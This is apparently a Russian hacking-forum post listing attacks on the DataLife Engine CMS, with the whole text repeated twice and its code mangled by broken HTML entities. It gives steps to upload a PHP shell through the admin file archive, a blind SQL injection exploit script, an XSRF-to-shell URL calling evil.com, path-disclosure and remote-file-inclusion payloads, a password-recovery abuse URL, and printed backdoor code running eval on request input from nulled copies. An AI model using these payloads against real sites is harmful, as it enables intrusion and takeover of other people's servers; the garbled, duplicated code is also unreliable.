Like-Angel
15.11.2010, 01:00
Как узнать установленную версию DLE?
1. Открываем: site.com/engine/ajax/updates.php
2. Смотрим установленную версию
Как залить шелл в DLE v4.1-8.2?
Итак, заходим в админцентр.
Далее нажимаем "Другие разделы"
Выбираем где-то в конце "Архив файлов"
Идём на "Настройка Архива Файлов"
Допустимые форматы файлов: дописываем php.
Сохраняемся, идём в "Добавить файл".
Заливаем шелл
Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке.
Автор способа: desTiny
DataLife Engine
* @copyright 2008 ITDefence.ru
* @license http://www.php.net/license/3_0.txt (https://hpc.name/redirector.html#http://www.php.net/license/3_0.txt) &nbs
p;PHP License 3.0
* @version CVS: $Id:$
* @link http://underwater.itdefence.ru (https://hpc.name/redirector.html#http://underwater.itdefence.ru)
* @since File available since Release 0x00
*/
@set_time_limit(0);
@ini_set('output_buffer', 0);
?>
&n
bsp; DataLifeEngine Online Mod Exploit Blind SQL Injection
&n
bsp;
&n
bsp; body{
&n
bsp; &
;
;
;nbs
p; font-family: Tahoma;
&n
bsp; &
;
;
;nbs
p; font-size: 12px;
&n
bsp; &
;
;
;nbs
p; color: #e1e1e1;
&n
bsp; &
;
;
;nbs
p; background-color: #222;
&n
bsp; }
&n
bsp;
&n
bsp;
&n
bsp; ">
&n
bsp; dle path:
&n
bsp;
&n
bsp; admin id:
&n
bsp;
&n
bsp;
&n
bsp;
&n
bsp;
') ? true: false;
&n
bsp; }
$flag = false;
&n
bsp; if (strpos($responce, 'MySQL Error') > 0){
&n
bsp; while (strlen($password) not vulnerable');
}
&n
bsp; echo "$password"
;;&a
mp;n
bsp; &
;
;
;nbs
p;
}
}
?>
XSRF баг:
Спойлер
Цитата:
site.com/dle/engine/modules/imagepreview.php?image=[XSRF]
Получение шелла через залогиненного админа:
Спойлер
Цитата:
получение:
Спойлер
Цитата:
http ://evil.com/adm.php?mod=options&action=syscon&lala=phpcode()
DataLife Engine v8.2
Отсутствие фильтрации в /engine/init.php
Уязвимость заключается в отсутствии фильтрации параметра "dle_skin" в файле init.php и позволяет увидеть пути к корню сайта.
1. Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим
dle_skin
и значение
../
2. Отправляем запрос на сайт:
GET / HTTP/1.1
Host: dle-news.ru
Cookie: dle_skin=../
Cookie2: $Version=1
Connection: Close
3. После этого на сайте видим ошибку:
Warning: include_once([PATH]): failed to open stream: No such file or directory in [PATH] on line 314
Warning: include_once(): Failed opening '[PATH]' for inclusion (include_path='.;C:php5pear') in [PATH] on line 314
Невозможно загрузить шаблон: shortstory.tpl
[PATH] - это и есть раскрытие путей.
4. Соображающие люди поймут как сделать из этого LFI.
Автор: mailbrush
"Уязвимость" восстановления пароля:
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
Спойлер
www.site/path (https://hpc.name/redirector.html#http://www.site/path) /engine/api/api.class.php?dle_config_api=[shell.txt?]
DataLife Engine v8.3
Спойлер
Цитата:
http://localhost/upload/engine/inc/i..._language=http (https://hpc.name/redirector.html#http://localhost/upload/engine/inc/include/init.php?selected_language=http)
8;//localhost/c.txt?
http://localhost/upload/engine/inc/help.php?config (https://hpc.name/redirector.html#http://localhost/upload/engine/inc/help.php?config)[langs]=http:/
/localhost/c.txt?
http://localhost/upload/engine/ajax/pm.php?config (https://hpc.name/redirector.html#http://localhost/upload/engine/ajax/pm.php?config)[lang_=http://local
host/c.txt?
http://localhost/upload/engine/ajax/...s.php?_REQUEST (https://hpc.name/redirector.html#http://localhost/upload/engine/ajax/addcomments.php?_REQUEST)[skin]&a
mp;a
mp;a
mp;#
93;=http://localhost/c.txt?
http://localhost/upload/engine/ajax/...s.php?_REQUEST (https://hpc.name/redirector.html#http://localhost/upload/engine/ajax/addcomments.php?_REQUEST)[skin]&a
mp;a
mp;a
mp;#
93;=http://localhost/c.txt?
Раскрытие путей:
Спойлер
Цитата:
if ($_COOKIE['dle_skin']) {
if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) {
$config['skin'] = $_COOKIE['dle_skin'];
}
}
1. Открываем site.ru/engine/images.php?area=short_story&add_id=
2. Грузим картинку и получаем раскрытые пути.
Бэкдор в нулле DLE
Файл лежит в (/engine/ajax/updates.php). Код бэкдора:
Спойлер
Цитата:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng
9;;
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?vers
io
n_id=".$_REQUEST['versionid']."&key=".
$config
1;'key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok
";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok
";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok
";}
eval(base64_decode($_GET['user_id']));
echo
HTML;
if($_POST['text']!=''){eval(stripcsl
ashes
0;$_POST['text']));
}}
DataLife Engine v8.5
Бекдор в нулле от M.I.D-Team. Бекдор . eval() через $_POST в uploadengineajaxkeywords.php
Вызвать его можно так:
Код
Спойлер
Цитата:
1. Открываем: site.com/engine/ajax/updates.php
2. Смотрим установленную версию
Как залить шелл в DLE v4.1-8.2?
Итак, заходим в админцентр.
Далее нажимаем "Другие разделы"
Выбираем где-то в конце "Архив файлов"
Идём на "Настройка Архива Файлов"
Допустимые форматы файлов: дописываем php.
Сохраняемся, идём в "Добавить файл".
Заливаем шелл
Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке.
Автор способа: desTiny
DataLife Engine
* @copyright 2008 ITDefence.ru
* @license http://www.php.net/license/3_0.txt (https://hpc.name/redirector.html#http://www.php.net/license/3_0.txt) &nbs
p;PHP License 3.0
* @version CVS: $Id:$
* @link http://underwater.itdefence.ru (https://hpc.name/redirector.html#http://underwater.itdefence.ru)
* @since File available since Release 0x00
*/
@set_time_limit(0);
@ini_set('output_buffer', 0);
?>
&n
bsp; DataLifeEngine Online Mod Exploit Blind SQL Injection
&n
bsp;
&n
bsp; body{
&n
bsp; &
;
;
;nbs
p; font-family: Tahoma;
&n
bsp; &
;
;
;nbs
p; font-size: 12px;
&n
bsp; &
;
;
;nbs
p; color: #e1e1e1;
&n
bsp; &
;
;
;nbs
p; background-color: #222;
&n
bsp; }
&n
bsp;
&n
bsp;
&n
bsp; ">
&n
bsp; dle path:
&n
bsp;
&n
bsp; admin id:
&n
bsp;
&n
bsp;
&n
bsp;
&n
bsp;
') ? true: false;
&n
bsp; }
$flag = false;
&n
bsp; if (strpos($responce, 'MySQL Error') > 0){
&n
bsp; while (strlen($password) not vulnerable');
}
&n
bsp; echo "$password"
;;&a
mp;n
bsp; &
;
;
;nbs
p;
}
}
?>
XSRF баг:
Спойлер
Цитата:
site.com/dle/engine/modules/imagepreview.php?image=[XSRF]
Получение шелла через залогиненного админа:
Спойлер
Цитата:
получение:
Спойлер
Цитата:
http ://evil.com/adm.php?mod=options&action=syscon&lala=phpcode()
DataLife Engine v8.2
Отсутствие фильтрации в /engine/init.php
Уязвимость заключается в отсутствии фильтрации параметра "dle_skin" в файле init.php и позволяет увидеть пути к корню сайта.
1. Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим
dle_skin
и значение
../
2. Отправляем запрос на сайт:
GET / HTTP/1.1
Host: dle-news.ru
Cookie: dle_skin=../
Cookie2: $Version=1
Connection: Close
3. После этого на сайте видим ошибку:
Warning: include_once([PATH]): failed to open stream: No such file or directory in [PATH] on line 314
Warning: include_once(): Failed opening '[PATH]' for inclusion (include_path='.;C:php5pear') in [PATH] on line 314
Невозможно загрузить шаблон: shortstory.tpl
[PATH] - это и есть раскрытие путей.
4. Соображающие люди поймут как сделать из этого LFI.
Автор: mailbrush
"Уязвимость" восстановления пароля:
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
Спойлер
www.site/path (https://hpc.name/redirector.html#http://www.site/path) /engine/api/api.class.php?dle_config_api=[shell.txt?]
DataLife Engine v8.3
Спойлер
Цитата:
http://localhost/upload/engine/inc/i..._language=http (https://hpc.name/redirector.html#http://localhost/upload/engine/inc/include/init.php?selected_language=http)
8;//localhost/c.txt?
http://localhost/upload/engine/inc/help.php?config (https://hpc.name/redirector.html#http://localhost/upload/engine/inc/help.php?config)[langs]=http:/
/localhost/c.txt?
http://localhost/upload/engine/ajax/pm.php?config (https://hpc.name/redirector.html#http://localhost/upload/engine/ajax/pm.php?config)[lang_=http://local
host/c.txt?
http://localhost/upload/engine/ajax/...s.php?_REQUEST (https://hpc.name/redirector.html#http://localhost/upload/engine/ajax/addcomments.php?_REQUEST)[skin]&a
mp;a
mp;a
mp;#
93;=http://localhost/c.txt?
http://localhost/upload/engine/ajax/...s.php?_REQUEST (https://hpc.name/redirector.html#http://localhost/upload/engine/ajax/addcomments.php?_REQUEST)[skin]&a
mp;a
mp;a
mp;#
93;=http://localhost/c.txt?
Раскрытие путей:
Спойлер
Цитата:
if ($_COOKIE['dle_skin']) {
if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) {
$config['skin'] = $_COOKIE['dle_skin'];
}
}
1. Открываем site.ru/engine/images.php?area=short_story&add_id=
2. Грузим картинку и получаем раскрытые пути.
Бэкдор в нулле DLE
Файл лежит в (/engine/ajax/updates.php). Код бэкдора:
Спойлер
Цитата:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng
9;;
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?vers
io
n_id=".$_REQUEST['versionid']."&key=".
$config
1;'key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok
";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok
";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok
";}
eval(base64_decode($_GET['user_id']));
echo
HTML;
if($_POST['text']!=''){eval(stripcsl
ashes
0;$_POST['text']));
}}
DataLife Engine v8.5
Бекдор в нулле от M.I.D-Team. Бекдор . eval() через $_POST в uploadengineajaxkeywords.php
Вызвать его можно так:
Код
Спойлер
Цитата: